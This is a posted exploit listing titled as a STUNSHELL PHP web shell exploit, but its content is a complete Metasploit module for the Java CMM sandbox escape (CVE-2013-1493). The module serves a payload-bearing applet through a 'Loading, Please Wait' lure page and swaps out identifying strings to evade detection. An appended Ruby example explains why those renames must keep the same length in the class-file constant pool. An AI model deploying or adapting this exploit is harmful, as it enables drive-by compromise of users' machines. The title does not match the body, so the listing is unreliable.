STUNSHELL PHP Web Shell Remote Code Execution
Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Pre-compiled applet classes shipped with the framework under data/exploits/cve-2013-1493.
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Rename the entry class with a random string of the same length so the
    # constant-pool length prefixes inside the class file stay valid.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Serve the applet JAR: payload classes plus the exploit classes loaded in setup.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Same-length replacement of well-known strings in entry names and class bytes.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Serve the landing page that embeds the applet.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
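The module above renames "Init", "metasploit" and "Payload" with rand_text_alpha(<same length>) rather than an arbitrary string, and does it with a plain gsub over the raw class bytes. The reason is the Java class file format: names live in the constant pool as CONSTANT_Utf8 entries (tag 0x01, a big-endian u2 byte length, then the bytes), so a replacement of a different length leaves a stale length prefix and the JVM rejects the class. The following added example (not part of the posted module or of Metasploit; the constant pool and class names are constructed here) builds a minimal pool, applies a same-length and a different-length substitution, and re-parses the bytes the way a class loader would:

```ruby
require 'securerandom'

# Encode one CONSTANT_Utf8 entry as in the JVM spec (4.4.7):
# tag 1, u2 big-endian byte length, then the string bytes.
def utf8_entry(str)
  [1, str.bytesize].pack('Cn') + str.b
end

# Build a constructed constant pool: u2 count (entries + 1, as in a real
# class file) followed by the Utf8 entries.  This is illustration only.
def build_pool(strings)
  [strings.size + 1].pack('n') + strings.map { |s| utf8_entry(s) }.join
end

# Walk the pool like a class loader would.  Returns the decoded strings, or
# nil when a tag or length prefix no longer matches the bytes that follow.
def parse_pool(bytes)
  count = bytes[0, 2].unpack1('n') - 1
  pos = 2
  out = []
  count.times do
    return nil if bytes[pos] != "\x01".b
    len = bytes[pos + 1, 2].unpack1('n')
    str = bytes[pos + 3, len]
    return nil if str.nil? || str.bytesize != len
    out << str
    pos += 3 + len
  end
  return nil unless pos == bytes.bytesize
  out
end

# Random alphabetic identifier of a fixed length, the role rand_text_alpha
# plays in the module (stdlib stand-in, not the Metasploit helper).
def random_alpha(len)
  alphabet = ('a'..'z').to_a
  Array.new(len) { alphabet[SecureRandom.random_number(alphabet.size)] }.join
end

# Substitute +old+ with +new+ in the raw pool bytes by plain gsub, exactly as
# the module does on class data, and report whether the pool still parses.
def rename_in_pool(pool_bytes, old, new)
  renamed = pool_bytes.gsub(old, new)
  [renamed, parse_pool(renamed)]
end

# Constructed names standing in for Init / metasploit / Payload in the real JAR.
SAMPLE_NAMES = ['Init', 'metasploit/Payload', 'java/lang/Object'].freeze

if __FILE__ == $0
  pool = build_pool(SAMPLE_NAMES)
  _, same_len = rename_in_pool(pool, 'Init', random_alpha('Init'.length))
  _, diff_len = rename_in_pool(pool, 'Init', 'LongerName')
  puts "same-length rename parses: #{!same_len.nil?}"   # true
  puts "longer rename parses:      #{!diff_len.nil?}"   # false
end
```

The same-length constraint is also why the module renames both entry.name and entry.data with the identical random string: the file name inside the JAR and the class name in the constant pool must agree, or the applet's class loader cannot resolve the entry class named in the applet tag.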